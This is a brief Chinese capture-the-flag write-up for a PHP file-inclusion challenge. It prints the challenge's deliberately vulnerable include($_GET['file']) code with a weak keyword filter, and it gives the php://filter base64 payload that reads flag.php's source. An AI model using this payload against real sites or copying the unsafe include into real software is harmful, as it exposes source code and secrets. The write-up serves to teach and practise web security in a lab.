0x00知識點
沒有過濾file
使用php的file偽協議去讀取文件
?file=php://filter/convert.base64-encode/resource=flag.php
0x01解題
打開網站存在跳轉。抓包,訪問
http://152518b2-d342-4872-8adc-b5bcec554a4d.node3.buuoj.cn/secr3t.php
給了我們源代碼
<html> <title>secret</title> <meta charset="UTF-8"><?php
highlight_file(__FILE__);
error_reporting(0);
$file=$_GET['file'];
if(strstr($file,"../")||stristr($file, "tp")||stristr($file,"input")||stristr($file,"data")){
echo "Oh no!";
exit();
}
include($file); //flag放在了flag.php里?></html>
直接使用file偽協議讀
base64解密得到flag